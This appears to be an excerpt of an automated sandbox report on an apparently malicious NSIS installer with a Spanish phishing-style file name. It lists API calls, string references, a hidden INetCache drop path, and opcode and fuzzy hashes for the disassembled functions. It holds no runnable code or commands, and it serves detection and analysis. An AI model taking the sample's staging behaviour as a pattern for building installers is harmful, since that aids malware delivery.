                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID: ?n$Call
                                                • API String ID: 3394109436-2302201974
                                                • Opcode ID: eb0d85568981212d004655e17b14bba425cdbbbf9f1fd0aa264f4d9e3e55e3d9
                                                • Instruction ID: bfeac54a7e569f0ef8803044b169413d496b9424a5b862e02772d0402316afe5
                                                • Opcode Fuzzy Hash: eb0d85568981212d004655e17b14bba425cdbbbf9f1fd0aa264f4d9e3e55e3d9
                                                • Instruction Fuzzy Hash: 5521AE72A44140EBCB20EBD48E8495E77B9EF94318B21457BF502B72D0DBB89851DF2D
                                                APIs
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000), ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll), ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                  • Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                  • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
                                                • CloseHandle.KERNELBASE(?,00000000,000000EB,00000000), ref: 00401F4D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: 184809114880b392ed9dd56e507eb2abdd9cc5b514a3cbe04fa1cd24f2890ba2
                                                • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
                                                • Opcode Fuzzy Hash: 184809114880b392ed9dd56e507eb2abdd9cc5b514a3cbe04fa1cd24f2890ba2
                                                • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A
                                                APIs
                                                  • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0,00000000), ref: 00405C7F
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable
                                                • API String ID: 1892508949-629450151
                                                • Opcode ID: f45346a17e49a49310934bebfc4de558bc436d66e5b9441c1e973121ad2ec1b9
                                                • Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
                                                • Opcode Fuzzy Hash: f45346a17e49a49310934bebfc4de558bc436d66e5b9441c1e973121ad2ec1b9
                                                • Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E
                                                APIs
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                  • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0,00000000), ref: 00405C7F
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0,00000000), ref: 00405D27
                                                • GetFileAttributesW.KERNELBASE(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0), ref: 00405D37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: 0_B
                                                • API String ID: 3248276644-2128305573
                                                • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
                                                • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                • CloseHandle.KERNEL32(?), ref: 00405928
                                                Strings
                                                • Error launching installer, xrefs: 00405905
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
                                                • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                • Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
                                                • Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                • Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                • Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
                                                • Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                • Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                • Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
                                                • Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                • Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                • Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
                                                • Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                • Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                • Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
                                                • Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                • Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                • Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
                                                • Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                • Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                • Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
                                                • Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                • Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44
                                                APIs
                                                  • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,000001EE,00000000,00000022,00000000,?,?), ref: 00402D85
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz2C67.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
